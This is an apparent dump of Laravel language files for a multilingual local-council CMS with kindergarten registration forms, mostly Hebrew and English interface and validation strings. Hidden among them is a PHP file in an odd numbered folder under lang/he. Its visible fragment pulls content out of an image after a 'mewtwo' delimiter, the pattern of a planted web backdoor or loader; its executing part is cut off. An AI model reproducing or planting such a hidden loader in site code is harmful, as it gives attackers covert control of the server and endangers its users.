=> 'נתוני אתר', 'settings' => 'הגדרות', 'dashboard' => 'לוח מחוונים', 'visitorsAnalytics' => 'סטטיסטיקת מבקרים', 'visitorsAnalyticsBydate' => 'לפי תאריך', 'visitorsAnalyticsByCity' => 'עיר', 'visitorsAnalyticsByRegion' => 'איזור', 'visitorsAnalyticsByAddress' => 'הכתובת', 'visitorsAnalyticsByCountry' => 'מדינה', 'visitorsAnalyticsByOperatingSystem' => 'מערכת הפעלה', 'visitorsAnalyticsByBrowser' => 'דפדפן', 'visitorsAnalyticsByScreenResolution' => 'רזולוציית מסך', 'visitorsAnalyticsByReachWay' => 'דרך הגעה', 'visitorsAnalyticsByHostName' => 'שם המארח', 'visitorsAnalyticsByOrganization' => 'ארגון', 'visitorsAnalyticsVisitorsHistory' => 'היסטוריה של מבקרים', 'visitorsAnalyticsIPInquiry' => 'ברור IP', 'visitorsAnalyticsLastVisit' => 'ביקור אחרון', 'members' => 'חברים', 'adsBanners' => 'באנר מודעות', 'siteInbox' => 'דואר נכנס', 'newsletter' => 'אנשי קשר', 'calendar' => 'לוח שנה', 'generalSiteSettings' => 'הגדרות כלליות לאתר', 'webmasterTools' => 'מנהל האתר', 'generalSettings' => 'הגדרות כלליות', 'siteSectionsSettings' => 'מדורי האתר', 'adsBannersSettings' => 'הגדרות באנר', 'languageSettings' => 'הגדרות שפה', 'siteMenus' => 'תפריטי האתר', 'usersPermissions' => 'משתמשים והרשאות', 'shoppingCart' => 'עגלת קניות', 'orders' => 'הזמנות', 'logout' => 'יציאה', 'checkAll' => 'סמן הכל', 'profile' => 'פרופיל', 'search' => 'חפש', 'new' => 'הוספה', 'add' => 'הוסף', 'update' => 'שמור שינויים', 'save' => 'שמירה', 'saveOrder' => 'שמור סדר', 'edit' => 'ערוך', 'delete' => 'הסר', 'undoDelete' => 'בטל מחיקה', 'cancel' => 'בטול', 'apply' => 'בצע', 'active' => 'פעיל', 'notActive' => 'לא מופעל', 'status' => 'סטטוס', 'visits' => 'ביקורים', 'contents' => 'תוכן', 'options' => 'אפשרויות', 'showing' => 'מציג', 'bulkAction' => 'פעולה בכמות גדולה', 'activeSelected' => 'הפעל רשומות', 'blockSelected' => 'חסום אלה שנבחרו', 'deleteSelected' => 'מחק בחירה', 'of' => 'מ', 'records' => 'רשומות', 'confirmation' => 'אישור', 'yes' => 'כן', 'no' => 'לא', 'confirmationDeleteMsg' => 'האם אתה בטוח שברצונך למחוק?', 'sectionsOf' => 'קטיגוריות', 'comments' => 'תגובות', 'videoTypes' => 'סיומות: mp4, ogv, webm', 'imagesTypes' => 'סוגים מותרים: .png, .jpg, .jpeg, .gif', 'audioTypes' => 'סיומות: .mp3, .wav', 'attachTypes' => 'סיומות: .* הכל', 'addDone' => 'בוצע הוספה בהצלחה', 'saveDone' => 'בוצע שמירת שינויים בהצלחה', 'deleteDone' => 'בוצע מחיקת נתונים בהצלחה', 'erorr' => 'אירעה שגיאה, נסה שוב', 'noData' => 'אין נתונים כאן עד עכשיו', 'appsSettings' => 'הפעל יישומים', 'fieldsSettings' => 'הגדרות שדות', 'frontSettings' => 'הגדרות Frontend', 'arabicLanguageFields' => 'הפעל שדות השפה הערבית', 'englishLanguageFields' => 'הפעל שדות בשפה האנגלית', 'seoTab' => 'SEO טאב', 'seoTabTitle' => 'הגדרות SEO', 'defaultCurrency' => 'מטבע ברירת מחדל', 'commentsStatus' => 'מצב ההערות', 'automaticPublish' => 'הפעלה ישירה בעת ההוספה', 'manualByAdmin' => 'ידנית על ידי מנהל', 'headerMenu' => 'תפריט כותרת', 'footerMenu' => 'תפריט תחתונה', 'homeSlideBanners' => 'באנר מצגת שקופיות בדף הבית', 'homeTextBanners' => 'באנרים טקסטואליים בדף הבית', 'sideBanners' => 'באנרים צדדיים', 'none' => 'ללא', 'newsletterGroup' => 'קבוצת הודעות דוא"ל (בתוך אנשי קשר)', 'homeRow1' => 'תוכן דף בית שורה 1', 'homeRow2' => 'תוכן דף בית שורה 2', 'homeRow3' => 'נושא אחרון (תחתונה)', 'contactPageId' => 'צור קשר דף (פרטים ומפות)', 'activeLanguages' => 'שפות מועדפות', 'activeLanguages1' => 'שפה אחת ( מועדפת ב .env )', 'activeLanguages2' => 'כל השפות', 'homeBanners' => 'באנרים ראשיים', 'textBanners' => 'באנרים טקסטואליים', 'sectionName' => 'כותרת סעיף', 'sectionType' => 'סוג סעיף', 'sectionNew' => 'סעיף חדש', 'sectionEdit' => 'ערוך סעיף', 'sectionIcon' => 'סמל', 'sectionFather' => 'סעיף אב', 'sectionNoFather' => 'סעיף אב', 'size' => 'גודל', 'width' => 'רוחב', 'height' => 'גובה', 'descriptionBox' => 'תיבה לתיאור', 'linkBox' => 'תיבה עבור כתובת אתר', 'sectionTypeCode' => 'קוד / טקסט', 'sectionTypePhoto' => 'תמונה', 'sectionTypeVideo' => 'סרטון', 'langVar' => 'משתנה השפה', 'sitePages' => 'דפי האתר', 'photos' => 'התמונות', 'blog' => 'בלוג', 'services' => 'שירותים', 'news' => 'חדשות', 'videos' => 'הסרטון', 'sounds' => 'אודיו', 'products' => 'מוצרים', 'typeTextPages' => 'כללי', 'typePhotos' => 'תמונות', 'typeVideos' => 'סרטונים', 'typeSounds' => 'הקלטות', 'hasCategories' => 'קטגוריות', 'reviewsAvailable' => 'אפשר תגובות', 'dateField' => 'שדה תאריך', 'longTextField' => 'שדה טקסט ארוך', 'allowEditor' => 'שימוש ב עורך', 'attachFileField' => 'שדה קובץ מצורף', 'additionalImages' => 'תמונות נוספים', 'attachGoogleMaps' => 'הוסף מפות גוגל', 'attachOrderForm' => 'הוסף פורם בקשה', 'withoutCategories' => 'ללא קטגוריות', 'mainCategoriesOnly' => 'קטגוריות ראשיות בלבד', 'mainAndSubCategories' => 'ראשי ותתי קטגוריות', 'sectionIconPicker' => 'סמל סעיף)(בוחר', 'topicsIconPicker' => 'סמל נושאים(בוחר)', 'iconPicker' => 'בחירת סמל', 'siteInfoSettings' => 'נתוני האתר', 'siteStatusSettings' => 'סטטוס האתר', 'siteSocialSettings' => 'קישורים חברתיים', 'siteContactsSettings' => 'אנשי קשר', 'websiteTitle' => 'כותרת האתר', 'metaDescription' => 'תיראו האתר', 'metaKeywords' => 'מלות מפתח', 'websiteUrl' => 'קישור האתר', 'websiteNotificationEmail' => 'דוא"ל הודעת אתר', 'websiteNotificationEmail1' => 'שלח לי אימייל בעת קבלת הודעה חדשה', 'websiteNotificationEmail2' => 'שלח אימייל בעת הוספת תגובה חדשה', 'websiteNotificationEmail3' => 'שלח לי דוא"ל על הזמנות חדשות', 'emailNotifications' => 'הודעות דוא"ל', 'contactAddress' => 'כתובת', 'contactPhone' => 'טלפון', 'contactFax' => 'פקס', 'contactMobile' => 'פאלפון', 'contactEmail' => 'דואר אלקטרוני', 'worksTime' => 'זמן עבודה', 'siteStatusSettingsPublished' => 'פורסם', 'siteStatusSettingsClosed' => 'סגור', 'siteStatusSettingsMsg' => 'הודעת סגירה', 'facebook' => 'Facebook', 'twitter' => 'Twitter', 'google' => 'Google+', 'linkedin' => 'Linkedin', 'youtube' => 'Youtube', 'instagram' => 'Instagram', 'pinterest' => 'Pinterest', 'tumblr' => 'Tumblr', 'flickr' => 'Flickr', 'whatapp' => 'Whatsapp', 'styleSettings' => 'הגדרות סגנון', 'siteLogo' => 'לוגו האתר', 'favicon' => 'סמל מועדף', 'appleIcon' => 'סמל אפל', 'styleColor1' => 'צבע סגנון 1', 'styleColor2' => 'צבע סגנון 2', 'restoreDefault' => 'שחזר ברירת מחדל', 'layoutMode' => 'מצב פריסה', 'wide' => 'רחב', 'boxed' => 'عرض محدد Boxed', 'backgroundStyle' => 'סוג הרקע', 'colorBackground' => 'צבע', 'patternsBackground' => 'תבנית רקע', 'imageBackground' => 'תמונה', 'newsletterSubscribe' => 'הירשם לניוזלטר', 'footerStyle' => 'סגנון כותרת תחתונה', 'footerStyleBg' => 'רקע כותרת תחתונה', 'preLoad' => 'טוען מראש', 'bannerAdd' => 'הוסף באנר חדש', 'bannerEdit' => 'ערוך באנר', 'bannerTitle' => 'כתובת המודעה', 'bannerSection' => 'מחלקה', 'bannerPhoto' => 'תמונת מודעה', 'bannerDetails' => 'פרטים', 'bannerLinkUrl' => 'קישור בעת לחיצה', 'bannerVideoType' => 'סוג סרטון', 'bannerVideoType1' => 'סרטון ישיר', 'bannerVideoType2' => 'סרטון מ יוטיוב', 'bannerVideoType3' => 'סרטון מ VEMO', 'bannerVideoFile' => 'קובץ סרטון', 'bannerVideoUrl' => 'קישור סרטון מיוטיוב', 'bannerVideoUrl2' => 'קישור סרטון מ VEMO', 'bannerCode' => 'קוד באנר', 'topicNew' => 'חדש', 'topicEdit' => 'ערוך', 'topicName' => 'כותרת', 'topicPhoto' => 'תמונה', 'topicSection' => 'סעיף', 'topicSelectSection' => 'בחר סעיף', 'topicDate' => 'תאריך', 'topicAudio' => 'קובץ אודיו', 'topicVideo' => 'קובץ וידיו', 'topicAttach' => 'קובץ מצורף', 'topicDeletedSection' => 'אין סעיף אב', 'topicTabSection' => 'פרטי סעיף', 'topicTabDetails' => 'פרטי נושא', 'topicSEOTitle' => 'כותרת דף', 'topicSEODesc' => 'תיאור מטא', 'topicSEOKeywords' => 'מילות מפתח', 'topicAdditionalPhotos' => 'תמונות', 'topicGoogleMaps' => 'מפות גוגל', 'topicDropFiles' => 'זרוק תמונות כאן או לחץ כדי להעלות', 'topicDropFiles2' => 'ניתן להעלות תמונות רבות בו-זמנית', 'topicCommentName' => 'שם', 'topicCommentEmail' => 'דוא"ל', 'topicComment' => 'תגובה', 'topicNewComment' => 'תגובה חדשה', 'topicNewMap' => 'הוספת מפה', 'topicMapTitle' => 'כותרת מפה', 'topicMapDetails' => 'פרטים', 'topicMapLocation' => 'מיקום', 'topicMapIcon' => 'סמל', 'topicMapClick' => 'לחץ על המיקום כדי להוסיף New Marker', 'topicMapORClick' => 'או לחץ כאן כדי להוסיף באופן ידני', 'allContacts' => 'כל אנשי הקשר', 'waitActivation' => 'המתן הפעלה', 'blockedContacts' => 'אנשי קשר חסומים', 'newGroup' => 'קבוצה חדשה', 'newContacts' => 'הוסף חשבון חדש', 'editContacts' => 'ערוך חשבון', 'deleteContacts' => 'הסר חשבון', 'searchAllContacts' => 'חפש בכל אנשי הקשר', 'firstName' => 'שם פרטי', 'lastName' => 'שם משפחה', 'companyName' => 'שם חברה', 'city' => 'עיר', 'country' => 'מדינה', 'notes' => 'הערות', 'group' => 'קבוצה', 'sendEmail' => 'שלח הודעה', 'callNow' => 'התקשר עכשיו', 'selectFile' => 'בחר קובץ', 'labels' => 'תוויות', 'inbox' => 'דוא"ל נכנס', 'sent' => 'נשלח', 'draft' => 'טיוטה', 'compose' => 'הודעה חדשה', 'makeAsRead' => 'סמן כנקראה', 'makeAsUnread' => 'סמן כלא נקראה', 'moveTo' => 'העבר אל', 'replay' => 'הגב להודעה', 'forward' => 'העבר', 'sendTo' => 'אל', 'sendFrom' => 'מ', 'sendCc' => 'Cc', 'sendBcc' => 'Bcc', 'sendTitle' => 'כותרת ההודעה', 'SaveToDraft' => 'שמור לטיוטה', 'send' => 'שליחה', 'print' => 'הדפסה', 'AttachFiles' => 'קבצים מצורפים', 'newEvent' => 'אירוע / הערה חדשים', 'eventTotal' => 'סה"כ', 'eventTitle' => 'כותרת', 'eventStart' => 'התחלת אירוע', 'eventEnd' => 'סוף אירוע', 'eventStart2' => 'תאריך התחלה', 'eventEnd2' => 'סוף אירוע', 'eventDetails' => 'פרטים', 'eventNote' => 'הערה', 'eventMeeting' => 'פגישה', 'eventEvent' => 'אירוע', 'eventTask' => 'משימה', 'eventType' => 'סוג', 'eventAt' => 'ב', 'eventToday' => 'יום', 'eventDay' => 'יום', 'eventWeek' => 'שבועי', 'eventMonth' => 'חודשי', 'eventDelete' => 'למחוק הערה זו / אירוע?', 'eventClear' => 'למחוק את כל ההערות והאירועים?', 'diagram' => 'תרשים', 'barDiagram' => 'הצג נתונים בצורת גרפים', 'visitors' => 'מס\' מבקרים', 'ip' => 'IP', 'pageViews' => 'מס\' דפים', 'today' => 'היום', 'yesterday' => 'אתמול', 'last7Days' => '7 הימים האחרונים', 'last30Days' => '30 הימים האחרונים', 'thisMonth' => 'החודש הזה', 'lastMonth' => 'חודש אחרון', 'applyFrom' => 'מ', 'applyTo' => 'אל', 'customRange' => 'טווח מותאם אישית', 'weekDays' => '"Su", "Mo", "Tu", "We", "Th", "Fr", "Sa"', 'monthsNames' => '"January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"', 'activity' => 'פעילות', 'activitiesHistory' => 'רשומות הפעולה', 'newUser' => 'הוספת משתמש חדש', 'editUser' => 'ערוך משתמש', 'fullName' => 'שם מלא', 'Permission' => 'סוג הרשאה', 'Permission1' => 'מנהל אתר', 'Permission2' => 'מנהל אתר (תכונות מלאות)', 'Permission3' => 'משתמש מוגבל (ללא מחיקה)', 'Permission4' => 'משתמש סקירה (הצג בלבד)', 'personalPhoto' => 'תמונת פרופיל', 'loginEmail' => 'דוא"ל', 'loginPassword' => 'סיסמה', 'users' => 'משתמשים', 'permissions' => 'הרשאות', 'newPermissions' => 'הוספת הרשאה חדשה', 'title' => 'כותרת', 'dataManagements' => 'ניהול נתונים', 'dataManagements1' => 'הנתונים שלו בלבד (עבור חשבונות אישיים)', 'dataManagements2' => 'כל נתוני המשתמשים (עבור חשבונות ניהול כללי)', 'activeApps' => 'תכניות מופעלים', 'activeSiteSections' => 'פרקים מופעלים באתר', 'addPermission' => 'הרשאות הוספה', 'editPermission' => 'הרשאות עריכה', 'deletePermission' => 'הרשאות מחיקה', 'viewOnly' => 'רק הצגה', 'editPermissions' => 'ערוך הרשאות', 'perAdd' => 'הוסף', 'perEdit' => 'עריכה', 'perDelete' => 'מחיקה', 'selectPermissionsType' => 'בחר סוג הרשאה', 'newLink' => 'הוסף קישור חדש', 'newMenu' => 'תפריט חדש', 'menuTitle' => 'כותרת תפריט', 'editSection' => 'ערוך קישור', 'linkType' => 'סוג קישור', 'linkType1' => 'כותרת ראשית', 'linkType2' => 'קישור ישיר', 'linkType3' => 'סעיף ראשי', 'linkType4' => 'רשימה נפתחת', 'linkURL' => 'קישור', 'linkSection' => 'קישור סעיף', 'sectionTitle' => 'כותרת סעיף / קישור', 'fatherSection' => 'סעיף אב', 'latestMessages' => 'הודעות', 'notesEvents' => 'הערות ואירועים', 'latestContacts' => 'אנשי קשר חדשים', 'more' => 'עוד', 'viewMore' => 'הצג עוד', 'addNew' => 'הוסף חדש', 'reports' => 'דוחות', 'reportsDetails' => 'תוכל להציג דוחות נוספים', 'hi' => 'היי', 'welcomeBack' => 'ברוך שובך', 'lastFor7Days' => 'מבקרים ב 7 ימים אחרונים', 'todayByCountry' => 'היום לפי ארץ', 'browsers' => 'דפדפן', 'browsersCalculated' => 'מחושב ב -7 הימים האחרונים', 'visitorsRate' => 'שיעור המבקרים', 'visitorsRateToday' => 'שיעור המבקרים במהלך היום הנוכחי', 'pages' => 'דפים', 'sections' => 'סעיפים', 'resultsFoundFor' => 'נמצאו תוצאות עבור', 'connectEmailToConnect' => 'קשר עם דואר אלקטרוני', 'connectEmail' => 'דואר אלקטרוני', 'connectPassword' => 'סיסמה', 'openWebmail' => 'פתח את Webmail', 'themeSwitcher' => 'מחליף נושא', 'foldedAside' => 'מקופל בצד', 'boxedLayout' => 'פריסת תיבת', 'themes' => 'ערכות נושא', 'themes1' => 'בהיר', 'themes2' => 'אפור', 'themes3' => 'כהה', 'themes4' => 'שחור', 'language' => 'שפה', 'change' => 'שמור שינויים', 'sitePreview' => 'אתר', 'oops' => 'סליחה', 'noPermission' => 'סליחה! אין לך הרשאה לצפות בדף זה', 'notFound' => 'סליחה! הדף לא קיים', 'forgotPassword' => 'שכחת סיסמה?', 'signIn' => 'היכנס', 'keepMeSignedIn' => 'השאר אותי מחובר', 'signedInToControl' => 'התחברות ללוח בקרה', 'control' => 'לוח בקרה', 'resetPassword' => 'שחזר סיסמה', 'confirmPassword' => 'אשר סיסמה', 'newPassword' => 'סיסמה חדשה', 'yourEmail' => 'דואר אלקטרוני שלך', 'sendPasswordResetLink' => 'שלח קישור שחזור סיסמה', 'returnTo' => 'חזור אחורה', 'enterYourEmail' => 'הזן את כתובת דוא"ל שלך למטה ואנו נשלח לך הוראות כיצד לשנות את הסיסמה שלך.', 'expireDateField' => 'תוקף שדה תאריך פג', 'expireDate' => 'תאריך תוקף', 'expired' => 'לא בתוקף', 'additionalFiles' => 'קבצים נוספים', 'relatedTopics' => 'נושאים קשורים', 'relatedTopicsAdd' => 'הוסף נושאים קשורים', 'relatedTopicsSelect' => 'בחר סעיף אתר לטעינת נושאים', 'customFields' => 'שדות נוספים', 'customFieldsTitle' => 'כתובת השדה', 'customFieldsType' => 'סוג השדה', 'customFieldsStatus' => 'סטטוס', 'customFieldsNewField' => 'הוספת שדה חדש', 'customFieldsEditField' => 'ערוך שדה', 'customFieldsRequired' => 'חובה', 'customFieldsOptional' => 'אופציונאלי', 'customFieldsDefault' => 'ערך ברירת מחדל', 'customFieldsOptions' => 'אפשרויות', 'customFieldsOptionsHelp' => 'הקלד כל אפשרות בשורה נפרדת', 'customFieldsForAllLang' => 'עבור כל השפות', 'customFieldsType0' => 'תיבת טקסט', 'customFieldsType1' => 'טקסט ארוך', 'customFieldsType2' => 'מספר', 'customFieldsType3' => 'דואר אלקטרוני', 'customFieldsType4' => 'תאריך', 'customFieldsType5' => 'תאריך וזמן', 'customFieldsType6' => 'בחר', 'customFieldsType7' => 'בחירה מרובה', 'customFieldsType8' => 'תמונה', 'customFieldsType9' => 'קובץ מצורף', 'customFieldsType10' => 'קובץ וידיאו', 'customFieldsType11' => 'קישור וידאו יוטיוב', 'customFieldsType12' => 'קישור וידאו Vimeo', 'optionalFields' => 'שדות אופציונליים', 'additionalTabs' => 'כרטיסיות נוספות', 'active_disable' => 'הפעל\\הפסק', 'friendlyURL' => 'כתובת אתר ידידותית', 'seoTabSettings' => 'נהל את כותרת הדף, תיאור המטא, מילות המפתח וכתובת האתר ידודית למנועי חיפוש וייחודית. כך תוכל לנהל את האופן שבו נושא זה מופיע במנועי חיפוש.', 'friendlyURLinks' => 'סוגי כתובות', 'friendlyURLinks1' => 'כתובות ברירת מחדל', 'friendlyURLinks2' => 'כתובות ידידותיות למנועי חיפוש', 'registrationSettings' => 'הגדרות הרשמה', 'allowRegister' => 'הפעלת האופציה הרישום בלוח בקרה', 'permissionForNewUsers' => 'קבוצת הרשאות לנרשמים חדש', 'createNewAccount' => 'צור חשבון חדש', 'APIStatus' => 'הפעל RESTful API', 'APIKey' => 'API מפתח', 'APIKeyGenerate' => 'צור מפתח חדש', 'APIKeyConfirm' => 'האם אתה בטוח שברצונך ליצר מפתח חדש?', 'homeRow_3' => 'תוכן דף בית שורה 3', 'partners' => 'العملاء', 'HebrewLanguageFields' => 'לשון עברית', 'departments' => 'מחלקות', 'History' => 'היסטוריה', 'attachformForm' => 'צרף טופס', 'form' => 'טופס', 'kindergartenReg' => 'הרשמה לגני ילדים', 'pupilbirthday' => 'תאריך לידה של התלמיד', 'pupilName' => 'שם התלמיד', 'pupilSex' => 'מין התלמיד', 'Gname' => 'גן', 'Hood' => 'שכונה', 'kindergartenInfo' => 'מידע על הגן', 'parentsInfo' => 'מידע לע ההורים', 'pupilRegInfo' => 'מידע על התלמיד', 'Year' => 'שנה', 'address' => 'כתובת', 'identification' => 'מספר זיהוי', 'notificationReg' => 'ההרשמה בוצעה בהצלחה בקרוב ניצור איתכם קשר.', 'notificationSubject' => 'הרשמה לגני ילדים', 'applicationSubmitSubject' => 'אישור תושבות', 'applicationSubmitMsg' => 'תושה יקר בקשתך התקבלה בהצלחה, והיא תטופל במהרה בסיום ניצור איתך קשר', 'applicationSubmitBackend' => 'הגיש בקשת אישור תושבות, נא לטפל בבקשתו במהירות', 'getNotifications' => 'התראות על שליחת טפסים', 'contacts' => 'אנשי קשר', ); lang/he/561663/index.php000064400000001055147565226300010466 0ustar00" . $x[1]); } else { echo "The delimiter 'mewtwo' was not found in the image content."; } ?>lang/he/desktop.ini000064400000000216147565226300010244 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 lang/he/pagination.php000064400000001026147565226300010734 0ustar00 '« Previous', 'next' => 'Next »', ]; lang/en/passwords.php000064400000000517147565226300010642 0ustar00 'Passwords must be at least six characters and match the confirmation.', 'reset' => 'Your password has been reset!', 'sent' => 'We have e-mailed your password reset link!', 'token' => 'This password reset token is invalid.', 'user' => 'We can\'t find a user with that e-mail address.', ); lang/en/auth.php000064400000000251147565226300007551 0ustar00 'These credentials do not match our records.', 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.', ); lang/en/validation.php000064400000014742147565226300010754 0ustar00 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, and dashes.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'numeric' => 'The :attribute must be between :min and :max.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'string' => 'The :attribute must be between :min and :max characters.', 'array' => 'The :attribute must have between :min and :max items.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'date' => 'The :attribute is not a valid date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'in_array' => 'The :attribute field does not exist in :other.', 'integer' => 'The :attribute must be an integer.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'max' => [ 'numeric' => 'The :attribute may not be greater than :max.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'string' => 'The :attribute may not be greater than :max characters.', 'array' => 'The :attribute may not have more than :max items.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'numeric' => 'The :attribute must be at least :min.', 'file' => 'The :attribute must be at least :min kilobytes.', 'string' => 'The :attribute must be at least :min characters.', 'array' => 'The :attribute must have at least :min items.', ], 'not_in' => 'The selected :attribute is invalid.', 'numeric' => 'The :attribute must be a number.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_with_all' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'numeric' => 'The :attribute must be :size.', 'file' => 'The :attribute must be :size kilobytes.', 'string' => 'The :attribute must be :size characters.', 'array' => 'The :attribute must contain :size items.', ], 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [], ]; lang/en/frontLang.php000064400000007362147565226300010554 0ustar00 'Dashboard', 'toTop' => 'to Top', 'AllRightsReserved' => 'All Rights Reserved', 'moreDetails' => 'More Details', 'viewMore' => 'View More', 'readMore' => 'Read More', 'downloadAttach' => 'Download Attachment', 'contactDetails' => 'Contact Details', 'callUs' => 'Call Us', 'callFax' => 'Fax', 'callMobile' => 'Mobile', 'callPhone' => 'Phone', 'callTimes' => 'Working Times', 'address' => 'Address', 'name' => 'Name', 'email' => 'Email', 'phone' => 'Phone', 'latestNews' => 'Latest News', 'ourGallery' => 'Our Gallery', 'subscribeToOurNewsletter' => 'Subscribe To Our Newsletter', 'subscribeToOurNewsletterDone' => 'You have Subscribed', 'subscribeToOurNewsletterError' => 'You Already Subscribed', 'newsletter' => 'Our Newsletter', 'subscribe' => 'Subscribe', 'yourEmail' => 'Your Email', 'yourName' => 'Your Name', 'enterYourName' => 'Please enter your name', 'enterYourEmail' => 'Please enter your email address', 'enterYourPhone' => 'Please enter your phone number', 'enterYourSubject' => 'Please enter a subject for your message', 'enterYourMessage' => 'Please type your message', 'youMessageSent' => 'Your message has been sent successfully, We will contact you as soon as possible. Thank you!', 'youMessageNotSent' => 'Error: Please try again', 'subject' => 'Subject', 'message' => 'Message', 'sendMessage' => 'Send Message', 'workingHours' => 'Working Hours', 'categories' => 'Categories', 'noData' => 'There is no data here up to now', 'mostViewed' => 'Most Viewed', 'share' => 'Share', 'locationMap' => 'Location Map', 'comments' => 'Comments', 'comment' => 'Comment', 'enterYourComment' => 'Please enter your comment', 'sendComment' => 'Send Comment', 'youCommentSent' => 'Your Comment has been sent successfully. Thank you!', 'newComment' => 'Add New Comment', 'refresh' => 'Refresh', 'getInTouch' => 'Get in touch with us by filling contact form below', 'homeContents1Title' => 'Latest Articles', 'homeContents1desc' => 'The latest articles from our blog, you can browse more', 'homeContents2Title' => 'Recent Works', 'homeContents2desc' => 'Some of our latest works, you can browse more', 'search' => 'Search for...', 'visits' => 'Visits', 'orderForm' => 'Order form', 'quantity' => 'Quantity', 'yourQuantity' => 'Please enter quantity', 'notes' => 'Notes', 'sendOrder' => 'Send Order', 'youOrderSent' => 'Your Order has been sent successfully. We will contact you as soon as possible.', 'partners' => 'Our Partners', 'partnersMsg' => 'Long term partnerships with leading local and international companies', 'fullName' => 'full Name', 'parentDetails' => 'Parent Details', 'idNumber' => 'Identification', 'pupilDetails' => 'Pupil Details', 'cname' => 'Pupil Name', 'choosekindergarden' => 'choose kindergarten', 'female' => 'Femal', 'chooseNeighborhood' => 'choose Neighborhood', 'chooseSex' => 'choose Sex', 'chooseStage' => 'chooseStage', 'easternNeighborhood' => 'eastern Neighborhood', 'KindergardenDetails' => 'Kindergarten Details', 'KindergardenYear1' => 'Kindergarten Year 1', 'KindergardenYear2' => 'Kindergarten Year 2', 'KindergardenYear3' => 'Kindergarten Year 3', 'male' => 'Male', 'northernNeighborhood' => 'northern Neighborhood', 'southernNeighborhood' => 'southern Neighborhood', 'westernNeighborhood' => 'western Neighborhood', 'applicationSubmission' => 'Application Submission', 'fName' => 'Family Name', 'NoFileChosen' => 'No File Chosen', 'pName' => 'Private Name', 'yourFamilyName' => 'Family Name', 'fillForm' => 'Fill Form', 'click' => 'click', 'shevyon' => 'موقع المجلس المحلي مدعوم من قبل وزارة المساواة الاجتماعية', ); lang/en/backLang.php000064400000044170147565226300010322 0ustar00 'ltr', 'code' => 'en', 'lang' => 'EN', 'left' => 'left', 'right' => 'right', 'arabicBox' => '[ العربية ]', 'englishBox' => '[ English ]', 'hebrewBox' => '[ עברית ]', 'rtl' => 'rtl', 'ltr' => 'ltr', 'boxCode' => 'en', 'boxCodeOther' => 'ar', 'translations' => 'Translations', 'calendarLanguage' => 'en', 'home' => 'Home', 'main' => 'Main', 'siteData' => 'Site Data', 'settings' => 'Settings', 'dashboard' => 'Dashboard', 'visitorsAnalytics' => 'Analytics', 'visitorsAnalyticsBydate' => 'By date', 'visitorsAnalyticsByCity' => 'City', 'visitorsAnalyticsByRegion' => 'Region', 'visitorsAnalyticsByAddress' => 'Address', 'visitorsAnalyticsByCountry' => 'Country', 'visitorsAnalyticsByOperatingSystem' => 'Operating system', 'visitorsAnalyticsByBrowser' => 'Browser', 'visitorsAnalyticsByScreenResolution' => 'Screen resolution', 'visitorsAnalyticsByReachWay' => 'Reach way', 'visitorsAnalyticsByHostName' => 'Host name', 'visitorsAnalyticsByOrganization' => 'Organization', 'visitorsAnalyticsVisitorsHistory' => 'Visitors History', 'visitorsAnalyticsIPInquiry' => 'IP Inquiry', 'visitorsAnalyticsLastVisit' => 'Last Visit', 'members' => 'Members', 'adsBanners' => 'Ad. Banners', 'siteInbox' => 'Inbox', 'newsletter' => 'Contacts', 'calendar' => 'Calendar', 'generalSiteSettings' => 'Settings', 'webmasterTools' => 'Webmaster', 'generalSettings' => 'General Settings', 'siteSectionsSettings' => 'Site Sections', 'adsBannersSettings' => 'Banners settings', 'languageSettings' => 'Language settings', 'siteMenus' => 'Site Menus', 'usersPermissions' => 'Users & Permissions', 'shoppingCart' => 'Shopping Cart', 'orders' => 'Orders', 'logout' => 'Logout', 'checkAll' => 'Check all', 'profile' => 'Profile', 'search' => 'Search', 'new' => 'New', 'add' => '  Add  ', 'update' => 'Update', 